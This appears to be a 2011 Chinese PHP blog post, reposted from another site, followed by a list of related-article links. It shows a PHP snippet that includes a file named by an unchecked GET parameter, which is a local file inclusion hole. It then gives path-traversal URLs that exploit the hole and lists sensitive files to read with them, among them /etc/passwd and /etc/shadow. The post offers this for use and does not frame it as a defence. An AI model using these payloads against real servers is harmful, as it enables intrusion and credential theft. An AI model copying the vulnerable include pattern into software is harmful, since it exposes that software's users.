编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

第九节绑定 [9]

Oct 09 PHP

php抓即时股票信息

Oct 09 PHP

用PHP的ob_start() 控制您的浏览器cache

Aug 03 PHP

PHP表单提交表单名称含有点号（.）则会被转化为下划线（_）

Dec 14 PHP

探讨php define()函数及defined()函数使用详解

Jun 09 PHP

php调用KyotoTycoon简单实例

Apr 02 PHP

PHP输入输出流学习笔记

May 12 PHP

WordPress中登陆后关闭登陆页面及设置用户不可见栏目

Dec 31 PHP

php生成txt文件实例代码介绍

Apr 28 PHP

php mysql like 实现多关键词搜索的方法

Oct 29 PHP

PHP排序算法之直接插入排序(Straight Insertion Sort)实例分析

Apr 20 PHP

Laravel 简单实现Ajax滚动加载示例

Oct 22 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

解密(1) 类加载器(1) apt命令(1) NoSQL(1) Launch Mode(1) netty(1) Pickle(1) logging(1) hashlib(1) 加密(1)

You might like

php桌面中心(一) 创建数据库

2007/03/11 PHP

过滤掉PHP数组中的重复值的实现代码

2011/07/17 PHP

php使用sql数据库获取字段问题介绍

2013/08/12 PHP

php的ZipArchive类用法实例

2014/10/20 PHP

PHP中Session可能会引起并发问题

2015/06/26 PHP

php 读取文件夹下所有图片、文件的实例

2018/10/17 PHP

Javascript常用运算符(Operators)-javascript基础教程

2007/12/14 Javascript

javascript动态添加样式(行内式/嵌入式/外链式等规则)

2013/06/24 Javascript

javascript Event对象详解及使用示例

2013/11/22 Javascript

js控制鼠标事件移动及移出效果显示

2014/10/19 Javascript

JavaScript转换二进制编码为ASCII码的方法

2015/04/16 Javascript

利用js实现禁止复制文本信息

2015/06/03 Javascript

jQuery实现可高亮显示的二级CSS菜单效果

2015/09/01 Javascript

解析NodeJs的调试方法

2016/12/11 NodeJs

关于微信jssdk实现多图片上传的一点心得分享

2016/12/13 Javascript

JS计算输出100元钱买100只鸡问题的解决方法

2018/01/04 Javascript

js实现购物车功能

2018/06/12 Javascript

微信小程序适配iphoneX的实现方法

2018/09/18 Javascript

详解VUE项目中安装和使用vant组件

2019/04/28 Javascript

微信小程序 scroll-view 水平滚动实现过程解析

2019/10/12 Javascript

Vue el-autocomplete远程搜索下拉框并实现自动填充功能(推荐)

2019/10/25 Javascript

ES5新增数组的实现方法

2020/05/12 Javascript

Python代理抓取并验证使用多线程实现

2013/05/03 Python

python获得两个数组交集、并集、差集的方法

2015/03/27 Python

操作Windows注册表的简单的Python程序制作教程

2015/04/07 Python

python初学者，用python实现基本的学生管理系统（python3）代码实例

2019/04/10 Python

python线程的几种创建方式详解

2019/08/29 Python

Python生成并下载文件后端代码实例

2020/08/31 Python

利用Canvas模仿百度贴吧客户端loading小球的方法示例

2017/08/13 HTML / CSS

详解前端HTML5几种存储方式的总结

2016/12/27 HTML / CSS

自我鉴定的范文

2013/10/03 职场文书

销售找工作求职信

2013/12/20 职场文书

酒店大堂副理的职责范文

2014/02/13 职场文书

优秀员工获奖感言

2014/03/01 职场文书

2019年市场部个人述职报告（三篇）

2019/10/23 职场文书

五年级作文之劳动作文

2019/11/12 职场文书